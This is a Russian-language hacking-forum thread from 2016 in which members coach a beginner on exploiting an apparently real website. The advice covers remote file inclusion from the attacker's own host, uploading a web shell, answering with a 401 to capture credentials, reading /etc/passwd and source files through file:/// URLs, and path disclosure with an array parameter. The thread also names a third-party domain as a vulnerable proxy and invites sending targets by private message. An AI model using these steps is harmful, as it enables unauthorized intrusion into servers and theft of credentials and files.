HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.10.2016, 12:13
pas9x
Guest
Сообщений: n/a
Провел на форуме:
97867

Репутация: 52
По умолчанию

Цитата:
Сообщение от sinfo  
sinfo said:

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).
Просто залей на hack.ru файл phpcode.txt с содержимым и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами
 
Ответить с цитированием

  #12  
Старый 12.10.2016, 13:56
korneev
Guest
Сообщений: n/a
Провел на форуме:
2726

Репутация: 2
По умолчанию

На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.

посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.
 
Ответить с цитированием

  #13  
Старый 12.10.2016, 14:09
sinfo
Guest
Сообщений: n/a
Провел на форуме:
4811

Репутация: 0
По умолчанию

file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
 
Ответить с цитированием

  #14  
Старый 12.10.2016, 14:13
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от sinfo  
sinfo said:

file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
 
Ответить с цитированием

  #15  
Старый 12.10.2016, 14:53
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
вот вот("и зачем читать passwd когда у него RFI?")

тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents

"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"

да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же

тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
 
Ответить с цитированием

  #16  
Старый 12.10.2016, 14:56
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

вот вот("и зачем читать passwd когда у него RFI?")
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents
"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
да ладно, вчера такую нашел, просто искать надо
правда там не lfi а чтение файлов через fopen, но всё же
тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
 
Ответить с цитированием

  #17  
Старый 12.10.2016, 15:07
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
нуу лень она двигатель типа))

http://dantant.com/proxy/miniProxy.p...://google.com/

для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене)
 
Ответить с цитированием

  #18  
Старый 12.10.2016, 15:26
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

нуу лень она двигатель типа))
http://dantant.com/proxy/miniProxy.p...://google.com/
для примера, прокся типа, хотя по факту читалка файлов
сам ещё толком не крутил, там какая то свалка на домене)
Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая

И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания

п.с спасибо за сыль, будет чем заняться на досуге
 
Ответить с цитированием

  #19  
Старый 13.10.2016, 15:36
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Кидай таргет в ЛС.
 
Ответить с цитированием

  #20  
Старый 14.10.2016, 01:15
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию

Цитата:
Сообщение от sinfo  
sinfo said:

file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?
Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например

пост в авторизации

site.com/login

post data

login[]=lol

дает нам /var/www/site.com/public_html/lol/db.php error 31 line

тогда мы имеем следующую возможность чтения

file:///var/www/site.com/public_html/index.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ